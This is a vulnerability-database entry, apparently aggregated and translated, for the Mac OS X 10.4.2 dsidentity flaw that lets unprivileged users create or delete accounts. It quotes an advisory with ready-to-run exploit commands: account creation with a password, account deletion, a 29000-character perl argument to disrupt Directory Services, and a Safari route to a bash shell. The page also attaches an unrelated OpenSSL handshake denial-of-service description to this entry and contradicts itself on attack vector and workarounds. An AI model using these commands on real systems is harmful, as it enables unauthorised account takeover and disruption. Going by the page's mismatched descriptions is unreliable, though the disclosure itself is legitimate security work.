Published: 2005-08-19 00:00:00
Revised: 2008-09-05 16:51:56

[Original] dsidentity in Directory Services in Mac OS X 10.4.2 allows local users to add or remove user accounts.

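[CNNVD] OpenSSL SSL handshake NULL pointer denial-of-service vulnerability (CNNVD-200508-212)

        OpenSSL has a flaw in its handling of the SSL/TLS handshake that a remote attacker can use to crash OpenSSL. Using the Codenomicon TLS test tool, OpenSSL found a NULL pointer assignment in the do_change_cipher_spec() function. A remote attacker can construct a special SSL/TLS handshake and send it to a server that uses the OpenSSL library, causing OpenSSL to crash; applications that depend on the library suffer a denial of service.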

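- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]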

- CPE (affected platforms and products)

cpe:/o:apple:mac_os_x:10.4.2  Apple Mac OS X 10.4.2
cpe:/o:apple:mac_os_x_server:10.4.2  Apple Mac OS X Server 10.4.2

- OVAL (technical details for detection)


- Official database links
(Official source) MITRE
(Official source) NVD
(Official source) CNNVD

- Other links and resources
(PATCH)  APPLE  APPLE-SA-2005-08-15
(PATCH)  APPLE  APPLE-SA-2005-08-17

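- Vulnerability information

OpenSSL SSL handshake NULL pointer denial-of-service vulnerability
Medium severity  Design error
2005-08-19 00:00:00 2005-10-20 00:00:00
        OpenSSL has a flaw in its handling of the SSL/TLS handshake that a remote attacker can use to crash OpenSSL. Using the Codenomicon TLS test tool, OpenSSL found a NULL pointer assignment in the do_change_cipher_spec() function. A remote attacker can construct a special SSL/TLS handshake and send it to a server that uses the OpenSSL library, causing OpenSSL to crash; applications that depend on the library suffer a denial of service.

- Advisories and patches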


- Vulnerability information (F39552)

DMA-2005-0818a.txt (PacketStormID:F39552)
2005-08-24 00:00:00
Kevin Finisterre

dsidentity on Apple OS X 10.4 allows any user on the system to add accounts to Directory Services.

DMA[2005-0818a] - 'Apple OSX dsidentity privilege abuse'
Author: Kevin Finisterre
Product: 'Mac OSX 10.4'

After roughly one hour of beating on the freshly released OSX 10.4 I found that /usr/sbin/dsidentity 
allows any user on the system to add accounts to Directory Services. Passwords can easily be set at 
the time of account creation, and the newly created account can be used to login to the OSX gui. Due 
to the lack of shell the account is limited in nature, however once you have logged into the gui 
accessing a shell is trivial. 

To add an account simply use the following command line and then you can now login as RickJames with the 
password isapimp. 

CrunkJuice:~ kevinfinisterre$ /usr/sbin/dsidentity -a RickJames -s isapimp -v

After logging in as RickJames open Safari and type file:///bin in the address bar. Double click on bash. 
Ignore the warning about not being authorized, and then click cancel when asked to close the application. 
Voila! Now you have a working bash shell as RickJames.

To remove an account from Directory Services use the following. 
CrunkJuice:~ kevinfinisterre$ /usr/sbin/dsidentity -r CharlieMurphy -v

If you really want to piss off someone's Directory Services try the following.
CrunkJuice:~ kevinfinisterre$ /usr/sbin/dsidentity -a `perl -e 'print "A" x 29000'`
(lather, rinse, repeat) 

Work Around: 
Install 2005-007 update or just rm -rf /usr/sbin/dsidentity

Neil Archibald of Suresec LTD also reported this issue to Apple at the same time I did. outlines extra detail about this issue with
regard to the use of getenv() calls. 

Timeline associated with this bug: 
05/25/2005 reported to Apple.
05/26/2005 followup to auto ticketing system #9116351
08/03/2005 AppleSeeds!
08/17/2005 Security Update 2005-007 v1.1 

- Vulnerability information (F39545)

adv5.pdf (PacketStormID:F39545)
2005-08-24 00:00:00
Ilja van Sprundel,Neil Archibald

Traceroute and ping suffer from buffer overflows and a user spoofing vulnerability exists in Mac OS X versions up to 10.3.9 and 10.4.2.

- Vulnerability information

Apple Mac OS X Directory Services dsidentity Arbitrary Account Manipulation
Local Access Required Other
Loss of Integrity
Exploit Unknown

- Vulnerability description

Mac OS X contains several flaws that may allow a malicious user to gain access to unauthorized privileges. The issue is caused by several flaws within the dsidentity tool, and may allow non-administrative users to manipulate accounts within Directory Services. This flaw may lead to a loss of integrity.

- Timeline

2005-08-17 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch to address this vulnerability.

- Related references

- Vulnerability credit

- Vulnerability information

Apple Mac OS X dsidentity Directory Services Account Creation and Deletion Vulnerability
Design Error 14630
No Yes
2005-08-15 12:00:00 2009-07-12 05:06:00
Discovery is credited to Neil Archibald and Kevin Finisterre.

- Affected software versions

Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X 10.4.2
Apple Mac OS X 10.4.1
Apple Mac OS X 10.4

- Vulnerability discussion

A vulnerability in Apple Directory Services allows unprivileged users to create or delete directory services identity accounts.

This issue was originally described in BID 14567 Apple Mac OS X Multiple Vulnerabilities. It is now being assigned its own BID.

- Exploit

An exploit is not required.

The following examples were provided:
To create an account named 'Username' with the password 'pass':
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -a Username -s pass -v

To delete an account named 'Username':
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -r Username -v

To create multiple accounts:
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -a `perl -e 'print "A" x 29000'`

- Solution

Apple has released fixes to address this and other vulnerabilities:

Apple Mac OS X 10.4.2

Apple Mac OS X Server 10.4.2

- Related references